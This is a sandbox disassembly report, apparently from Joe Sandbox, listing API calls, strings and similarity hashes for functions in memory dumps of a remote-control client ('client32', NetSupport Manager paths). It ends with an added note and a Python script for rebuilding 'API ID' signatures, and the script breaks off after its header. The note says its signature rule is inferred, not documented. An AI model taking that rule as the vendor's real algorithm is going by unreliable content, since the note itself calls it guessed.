                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                    • String ID: deque<T> too long
                                                                                                                                                    • API String ID: 827257264-309773918
                                                                                                                                                    • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                                                                                    • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                                                                                    • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                                                                                    • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
APIs
  • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
• GetWindowRect.USER32(?,?), ref: 111194E1
• MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
• GetClientRect.USER32(?,?), ref: 11119508
• GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
• GetSystemMetrics.USER32(00000003), ref: 11119559
• GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
• GetSystemMetrics.USER32(00000002), ref: 11119576
Strings
• GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
Yara matches
Similarity
• API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
• String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
• API String ID: 4172599486-2052393828
• Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
• Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
• Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
• Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
APIs
  • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
  • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
  • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
• wsprintfA.USER32 ref: 1100977F
• wsprintfA.USER32 ref: 11009799
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
Strings
Yara matches
Similarity
• API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
• String ID: %s%s.htm$.%u$ApprovedWebList$Store\
• API String ID: 559337438-1872371932
• Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
• Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
• Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
• Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
APIs
• GetDlgItem.USER32(?,?), ref: 11025351
  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
• SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
• SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
• SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
Strings
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                                                                                    • String ID: 8
                                                                                                                                                    • API String ID: 762489935-4194326291
                                                                                                                                                    • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                                                                    • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                                                                                    • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                                                                    • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
APIs
• GetMenuItemCount.USER32(?), ref: 1100521E
• _memset.LIBCMT ref: 11005240
• GetMenuItemID.USER32(?,00000000), ref: 11005254
• CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
• EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
• GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
• SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ItemMenu$Info$CheckCountEnable_memset
• String ID: 0
• API String ID: 2755257978-4108050209
APIs
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,75730BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
• RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
• LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
• lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
• lstrlenA.KERNEL32(00000000), ref: 111317ED
• LocalFree.KERNEL32(00000000), ref: 11131808
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
• String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
• API String ID: 2999768849-588814233
APIs
• _memset.LIBCMT ref: 1101D750
• GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
• _memset.LIBCMT ref: 1101D77A
• RegisterClassExA.USER32(?), ref: 1101D7BB
• CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
• GetWindowRect.USER32(00000000,?), ref: 1101D7FB
• DestroyWindow.USER32(00000000), ref: 1101D802
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Class_memset$CreateDestroyInfoRectRegister
• String ID: NSMChatSizeWnd
• API String ID: 2883038198-4119039562
APIs
• _malloc.LIBCMT ref: 110334CA
• _memset.LIBCMT ref: 11033501
• RegisterClipboardFormatA.USER32(?), ref: 11033529
• GetLastError.KERNEL32 ref: 11033534
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• _memmove.LIBCMT ref: 1103357E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
• String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
• API String ID: 2414640225-228067302
APIs
Strings
• IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
• Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
• HandleIPC ret %x, took %d ms, xrefs: 11027110
• IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
• Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountTick$Sleep
• String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
• API String ID: 4250438611-314227603
• Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
• Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
• Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
• Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
APIs
• _strncmp.LIBCMT ref: 1100953A
• _strncmp.LIBCMT ref: 1100954A
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,1EF76653), ref: 110095EB
Strings
• http://, xrefs: 11009535, 11009548
• <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
• IsA(), xrefs: 110095A5, 110095CD
• https://, xrefs: 1100952F
• e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _strncmp$FileWrite
• String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
• API String ID: 1635020204-3154135529
• Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
• Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
• Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
• Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
APIs
• GetWindowTextA.USER32(?,?,00000080), ref: 11027474
• GetClassNameA.USER32(?,?,00000080), ref: 1102749F
• GetDlgItem.USER32(?,00000001), ref: 110274C8
• GetDlgItem.USER32(?,00000004), ref: 110274CF
• GetDlgItem.USER32(?,00000008), ref: 110274DA
• PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Item$ClassMessageNamePostTextWindow
• String ID: #32770$Tapiexe
• API String ID: 3170390011-3313516769
• Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
• Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
• Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
• Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
APIs
• GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
  • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
• SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
• GetDlgItem.USER32(?,?), ref: 11023414
• SetFocus.USER32(00000000), ref: 11023417
• GetDlgItem.USER32(00000000,?), ref: 11023445
• EnableWindow.USER32(00000000,00000000), ref: 1102344A
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
• API String ID: 1605826578-1986719024
• Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
• Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
• Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
• Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
APIs
• GetMenuItemCount.USER32(?), ref: 1114513D
• _memset.LIBCMT ref: 1114515E
• GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
• CreatePopupMenu.USER32 ref: 111451AA
• GetMenuItemCount.USER32(?), ref: 111451D3
• InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
• GetMenuItemCount.USER32(?), ref: 111451EB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 74472576-4108050209
                                                                                                                                                    • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                                                    • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                                                                    • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                                                    • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
APIs
• GetParent.USER32(?), ref: 11039768
• GetDlgItem.USER32(00000000,00000001), ref: 11039771
• IsWindowEnabled.USER32(00000000), ref: 11039778
• PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
• GetParent.USER32(?), ref: 110397B6
• GetWindowRect.USER32(?,?), ref: 110397C3
• IntersectRect.USER32(?,?,?), ref: 110397FC
• GetWindowRect.USER32(00000000,?), ref: 11039836
• SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
• String ID:
• API String ID: 818519836-0
• Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
• Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
• Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
• Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
APIs
• GetDC.USER32(00000000), ref: 11153763
• CreateCompatibleDC.GDI32(00000000), ref: 11153779
• SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
• CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
• SelectObject.GDI32(00000000,00000000), ref: 1115389B
• SelectObject.GDI32(00000000,?), ref: 111538C1
• SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
• DeleteDC.GDI32(00000000), ref: 111538D8
• ReleaseDC.USER32(00000000,?), ref: 111538E7
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
• String ID:
• API String ID: 602542589-0
• Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
• Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
• Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
• Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
APIs
  • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
  • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F1590,?,110CD955,00000000,76963760), ref: 111103E8
  • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD955,00000000,76963760), ref: 11110408
• EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
• SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
• SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
• IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
• LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
• DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
• String ID:
• API String ID: 1497311044-0
• Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
• Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
• Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
• Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
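Each Similarity section above carries an "API ID" string (for example Menu$Item$Count$CreateInfoInsertPopup_memset) that summarises the function's API call list and is what lets functions from different dumps and different reports be matched against each other. The script below is an added example written for this page, not Joe Sandbox code: it parses call lines in the format shown in the APIs sections and rebuilds that signature with a rule inferred from the four signatures visible here. The rule (split the API name on CamelCase, drop the A/W suffix, merge the compound CriticalSection, drop tokens of three or fewer characters, group the remaining tokens by call frequency with $ between groups and alphabetical order inside a group) reproduces all four, but the vendor's real algorithm is not documented on this page, so MIN_TOKEN_LEN and COMPOUNDS are assumptions fitted to this report. The sample input is the four APIs lists of the entries above, copied verbatim.

```python
"""Rebuild a function's "API ID" signature (see the Similarity sections above)
from its API call list.  Added example for this page, not Joe Sandbox code: the
rule is inferred from the four signatures visible here and reproduces them, but
the vendor's algorithm is undocumented, so MIN_TOKEN_LEN and COMPOUNDS are
assumptions fitted to this report."""
import re
from collections import Counter

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", with or without a
# leading "Part of subcall function XXXXXXXX:".
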